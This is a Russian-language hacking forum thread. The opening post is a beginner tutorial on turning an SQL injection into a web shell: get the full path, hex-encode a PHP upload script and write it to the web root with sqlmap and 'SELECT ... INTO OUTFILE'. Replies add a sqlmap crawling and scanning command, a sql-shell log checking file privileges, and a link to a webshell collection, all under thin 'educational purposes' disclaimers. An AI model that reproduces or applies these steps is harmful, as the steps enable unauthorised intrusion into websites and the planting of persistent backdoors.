Доброго времени суток, друзья. Я давно натыкался на статейку, сейчас уже не могу её найти. Но думаю вам будет интересно почитать. Сразу говорю, статья не для пропентестеров, а для тех кто только начинает свой путь в этой сфере. Не судите строго... Для начала нам понадобится: 1) PHPSHell 2) SQLmap 3) Скрипт на пхыеСкрипт аплоада на Пых'е ============================= Первым делом, после того как мы нашли уязвимость, нам надо получить FPD. Варинтов множество, но мне обычно подходит Array[] Parameter инъекция. И получаем ожидаемое. Далее нам нужно перевезти код "нашего" скрипта для аплоада в hex. На выхлопе мы получаем незатейливый кодец и стремительно запускаем скульмап. Для получения максимальной информации я стараюсь убить двух зайцев сразу, чего и вам советую. Помимо того, что мы хотим попасть в шелл SQL было бы славно познакомиться с базой. Перед нашими глазами воспрянет: Наша команда должна иметь вид: Code: SELECT 0xНаш_хекс_код INTO OUTFILE "Полный/путь/и_имя/файла.php"; Допустим мы назвали его upload.php, значит дико-бешено бежим на http://www.example.com/upload.php. Заливаем шелл и занимаемся его поиском. После чего можно логиниться на него и продолжать идти к намеченной цели. =========== Работает это только на MySQL и только с file-priv "Y" Статья написана в ознакомительных целях, только для расширения кругозора новичков. Автор не несёт ответственности на её использование.
Ну раз "я".. Всё дело в знаниях, актуальности и востребованности.. мб и "могу", но с февраля уж столько прошло и потом вот это такое призрачное, но флаг в руки если кто-то воспользуется, но для начала откопает..
так вот еще одно обязательное условие: реальные кавычки в пути до файла. http://forum.antichat.ru/threads/34338/
Наверное словосочетание sqlmap сканер, уже потеряло актуальность. Однако sql не только инструмент для "раскрутки" уязвимости. Но он ещё реально сканер, да-да, сканер, и как вы догадались он находит sql уязвимые параметры в GET and POST запросах Вот маленький пример sqlmap --random-agent -u site.org --form --crawl=2 --batch Где : --form "обработка" post данных альтернатива (--data ) --crawl=2 <- вы наверное догадались. сканирование структуры сайта --batch это то что делает процесс полностью автоматичиски. вам остаётся только ждать --random-agent = произвольный юзер агент Так маленько дополнение к sqlmap
у меня вылазит при Code: sql-shell> select user from mysql.user where file_priv='Y' [05:08:20] [INFO] fetching SQL SELECT statement query output: 'select user from mysql.user where file_priv='Y'' [05:08:20] [INFO] the SQL query used returns 2 entries [05:08:20] [INFO] resumed: root [05:08:20] [INFO] resumed: root select user from mysql.user where file_priv='Y' [1]: [*] root в чём может быть проблема?=( пытаюсь провернуть на 2 сайтах, везде одно и тоже
А тебя не смущает что это всего лишь SQL-шел ? А человек просто пытается понять есть ли у него права на запись в файл.
Неа, всё в порядке. просто если бы не было бы прав ему бы не дался бы такой интерфейс, так же можно ещё и через sql квери
Автору надо еще видос записать и будет само то Добавлю от себя PHP shell можно взять здесь https://github.com/HARDLINUX/webshell Конечно все в ознакомительных целях